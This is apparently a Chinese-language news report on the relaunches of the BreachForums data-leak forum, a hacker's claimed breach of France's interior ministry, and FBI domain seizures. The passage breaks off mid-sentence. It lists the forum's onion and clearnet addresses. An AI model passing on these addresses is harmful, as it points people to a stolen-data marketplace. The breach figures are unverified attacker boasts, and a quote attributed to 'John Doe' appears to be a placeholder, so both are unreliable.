Indra宣称对此次针对法国内政部的网络攻击负责,他在声明中吹嘘,他们已获取了两个数据库的信息:TAJ(司法记录处理系统)和PFR(通缉犯档案)以及电子邮件。据报道,此次数据泄露事件影响了约1600万人。
截至目前,Indra称其仍可访问法国内政部的CHEOPS门户系统。研究人员认为黑客看起来正在使用法国内政部的Roundcube邮件系统发送电子邮件。
新BreachForums论坛管理员Indra的声明 管理员Indra于12 月13日在Breachforums发布一篇新的公告声明,对“蜜罐”事件及其他相关报道造成的误解深表歉意,对社区关注的事情进行了解释,并直接指责法国当局,提到了去年夏天在法国发生的逮捕事件。
管理员Indra在帖子中称,BreachForums”最初是“ShinyHunters/hollow”以及他们之前的另一个组织的项目。他们的整个组织(hollow、shiny等等)都被逮捕了。只有一个人拥有最初的“ShinyHunters PGP”密钥,而这个人是其朋友,但是他们之间产生了矛盾。因此,“诱饵”、“蜜罐”信息是假的,只是想关闭BreachForums,所以其就照做了。
Indra表示,在关闭网站并于15天内所有域名被查封后,相信大家都认为他们是FBI探员之类的。但显然们不是,他们会向BreachForums社区证明这一点。Indra宣布,为了报复被捕的朋友,他们已成功攻陷“MININT”——法国内政部。
Indra称,正如法国新闻报道的那样,法国内政部只承认政府私人电子邮件服务器被非法访问。但他们们绝口不提从警方档案中获取的16,444,373名个人的数据?
Indra问道,你们知道“TAJ”(Traitement d’Antécédents Judiciaires——犯罪记录处理系统)吗? “FPR”(Fichier des Personnes Recherchées——通缉犯数据库)呢?还有更多。国际刑警组织呢?你们是不是试图向他们隐瞒我们入侵“EASF MI”系统的事实?此外,你们为什么不向法国人民和全世界说明那两周究竟发生了什么?公共财政部门( DGFIP)呢?为什么只字未提?养老金部门( CNAV)呢?
随着FBI的公告宣布查封BreachForums域名,“暗网下/AWX”报道称BreachForums时代已经终结,然而FBI又被打脸,臭名昭著的暗网数据泄露论坛BreachForums再次出现,与前几个版本类似,在明网与暗网均可访问,由老版本BreachForums论坛管理员“koko”启动,且冒天下之大不韪使用泰国、赞比亚等国家警方的邮箱发送欢迎邮件。
长期以来,BreachForums一直是数据泄露、黑客工具和非法交易的中心,在一系列国际联合执法部门的打击中,陆续由多个版本出现,被打击后又消亡,并在今年上半年彻底被摧毁。然而,仅仅几个月后,它又重新启动,既说明了此类论坛的受欢迎程度高,也表明了网络犯罪论坛的顽强生命力。
新版本BreachForums论坛是由老版本BreachForums论坛版主“koko”创建的,他在一篇置顶帖中声称,他在2023至2024年期间担任BreachForums版主,经过团队慎重商议,决定让BreachForums重启。目前核心功能已通过最近的备份完全恢复。用户可以再次浏览专门讨论被盗凭证、勒索软件讨论和零日漏洞的版块。“Koko”强调,新版本BreachForums论坛“比以往任何时候都更加强大”,并增强了匿名功能以逃避检测。
新版本BreachForums并没有直接延续旧的版本 “koko”称,对暗网社区而言,过去一年充满挑战,但他们已重整旗鼓,准备重建家园!然而,新版本BreachForums并非旧版本的延续,而又是全新的开始,但界面继承了老版本的界面,且“koko”表示核心功能已从备份中恢复,团队正在从头开始重建托管服务,以解决前期存在的网站漏洞。
“我们从错误中吸取了教训,”Koko写道,并承诺改进加密和多重签名钱包,以防止未来发生盗窃。
新版本BreachForums使用了新的暗网V3域名:
http://ujdswnhjybusy2i4vcsfpkezrtg27glkxu3t5b4ttszhxyqaz3gpkbyd[.]onion
除了可以通过暗网浏览,新版本BreachForums也支持在一个新的明网域名访问,这旨在吸引更广泛的受众,包括那些不太懂技术、不愿使用Tor网络的网络犯罪分子。
新版本BreachForums论坛提供了几项重要更新:
备份与功能:已完成所有核心功能的完整备份,确保系统运行顺畅无碍。未来用户将获得无缝体验。 托管系统:托管系统正在从零重建。旧系统曾多次遭各类机构入侵,且无人知晓有多少代理曾访问数据库。为保障安全可靠性,将采用全新更安全的系统。 用户名安全:强烈建议勿使用旧用户名。此举将危及您的操作安全。请创建全新身份以保障安全。 等级恢复:凡在BF历代版本(BFv1、BFv2、BFv3…)中拥有等级的用户,将予以恢复。请联系@koko提交恢复申请。 尽管“koko”持乐观态度,但他也表示,许多人目前仍对论坛部门运营人员表示怀疑。许多论坛老手怀疑新版本BreachForums可能是执法部门故意设置控的蜜罐。一位匿名发帖者评论道:“这太干净、太快了”,他担心美国联邦调查局或特勤局等机构可能会监视活动以建立案件。
网络安全专家敦促任何访问该网站的人都要谨慎。“ BreachForums一直是一把双刃剑,它既能为研究人员提供宝贵的情报,又能吸引真正的威胁。”一家领先安全公司的威胁分析师John Doe说道。
明网域名可能使用加密货币注册 新版本BreachForums的明网域名是breached[.]sh,.sh域名是圣赫勒拿岛(Saint Helena)、亚森欣和特里斯坦-达库尼亚群岛的的国家代码顶级域名(ccTLD),该域名注册商为“NICENIC INTERNATIONAL GROUP CO., LIMITED”。NiceNIC是一家总部位于香港的网络服务公司,以其品牌NiceNIC.NET运营,是ICANN认证的域名注册商。
根据whois信息,breached[.]sh域名注册于2025年10月15日,使用了ddos-guard.net的解析服务,应是为了保证网站的安全性。域名使用了whois保护,因此无法查询域名注册时填写的注册者与管理员信息。
虽然Recorded Future等网络安全公司已发出警告,指出当局更容易通过IP日志和托管服务提供商追踪明网域名。
不过由于NiceNIC是一家拥抱加密的公司,该服务商支持多种加密货币支付,包括比特币(Bitcoin), 泰达币(Tether USDT),以太坊(ETH), 莱特币(LTC),门罗币(XMR)。因此,新版本BreachForums明网域名breached[.]sh背后真实的注册者信息估计非常难以追踪。
新版本BreachForums论坛通过使用泰国、赞比亚等多国警方的被盗邮箱传播 据多家威胁情报机构表示,新版本论坛涉嫌滥用泰国警方官方邮箱域名(police.go.th)、赞比亚警察局官方邮箱域名(zambiapolice.org.zm)开展宣传推广活动。而发送邮件的警方邮箱大多都是在各种数据泄露事件中的泄露的。
新版本论坛的管理员似乎正利用被盗的执法机构邮箱账户,绕过垃圾邮件过滤器和安全检查,使宣传信息显得更具合法性,也体现其自身的权威性,从而增强目标推广对象的信任感,使新版本BreachForums论坛呈现真实可信的表象。
新版本BreachForums论坛已经在打包出售 新版本BreachForums论坛创始人“koko”发布置顶帖子公告,称其正在寻找新的所有者,出售新版本BreachForums论坛,他们将向其转让所有权,整体售价仅为5000美元。
购买成功的新所有者将获得:
基础设施的完整访问权限(6台服务器) 域名 CDN DDOS防护 代理服务器 被扣押的旧数据库(30万+用户) 托管交易数据库(含32,000余笔托管交易) “koko”在帖子中提供了用于交易谈判的加密即时聊天工具Session的联系码,并要求新所有者须具备管理该职位及全套基础设施的能力,且要延续BreachForums现有运营理念。
今日,FBI查封了勒索软件团伙Scattered Lapsus$ Hunters使用的BreachForums域名(Breachforums.hn),正如前期“暗网下/AWX”报道,勒索组织针对Salesforce及其客户开展黑客攻击后开设了暗网泄密网站,而该域名是数据泄露网站在明网的镜像。
今年夏天,Breachforums[.]hn域名曾用于重新启动暗网数据泄露论坛Breachforums,但在一些核心运营管理员被捕后,该网站很快再次下线。根据“暗网下/AWX”之前的报道,今年6月份,法国执法部门逮捕了包括ShinyHunters、Hollow、Noct和Depressed在内的四名BreachForums成员,美国起诉了另一名BreachForums成员IntelBroker。7月份,ShinyHunters曾宣布重新启动 BreachForums,一个月后,新BreachForums论坛下线,ShinyHunters发布了一条带有PGP签名的消息,称该论坛的基础设施已被法国BL2C部门和FBI查封,并表示不会再重启。
本月初,该域名被Scattered Lapsus$ Hunters团伙转变为针对Salesforce数据泄露的网站,目的是勒索Salesforce以及受到影响的客户公司。根据“暗网下/AWX”之前的介绍,Scattered Lapsus$ Hunters团伙由与Scattered Spider、Lapsus$和ShinyHunters勒索软件团伙有关联的成员组成。
本周,Breachforums[.]hn域名已经无法访问,10月8日,该团伙在Telegram频道宣布不再运营明网域名。10月9日,Breachforums[.]hn域名被FBI接管,域名的NS服务器被切换为ns1.fbi.seized.gov和ns2.fbi.seized.gov,目前访问该域名显示巨大的扣押横幅。
根据扣押信息,在Scattered Lapsus$ Hunters团伙开始泄露Salesforce被盗数据之前,美国和法国的执法部门合作控制了BreachForums的所有网络基础设施。
FBI在X上称,联邦调查局及其合作伙伴已查封与BreachForums相关的域名。该犯罪市场平台被ShinyHunters、Baphomet和IntelBroker等团伙用于贩卖窃取数据并实施敲诈勒索。此次行动切断了犯罪分子利用该枢纽平台牟利、招募同伙及跨行业锁定受害者的关键通道,彰显了国际执法协同行动的威慑力——必将让网络犯罪幕后黑手付出代价。
The FBI and our partners have seized domains associated with BreachForums, a major criminal marketplace used by ShinyHunters, Baphomet, and IntelBroker to traffic stolen data and facilitate extortion.
This takedown removes access to a key hub used by these actors to monetize… pic.twitter.com/aiTRzFCIYU
— FBI (@FBI) October 12, 2025 对此,Scattered Lapsus$ Hunters团伙在Telegram频道挑衅道,扣押一个域名不会影响其行动,FBI还需要更加努力。
Scattered Lapsus$ Hunters团伙在Telegram频道发布声明回应明网域名被扣押 10月10日,Scattered Lapsus$ Hunters团伙在Telegram频道、暗网网站以及pastebin同步发布带有PGP签名的声明,确认Breachforums[.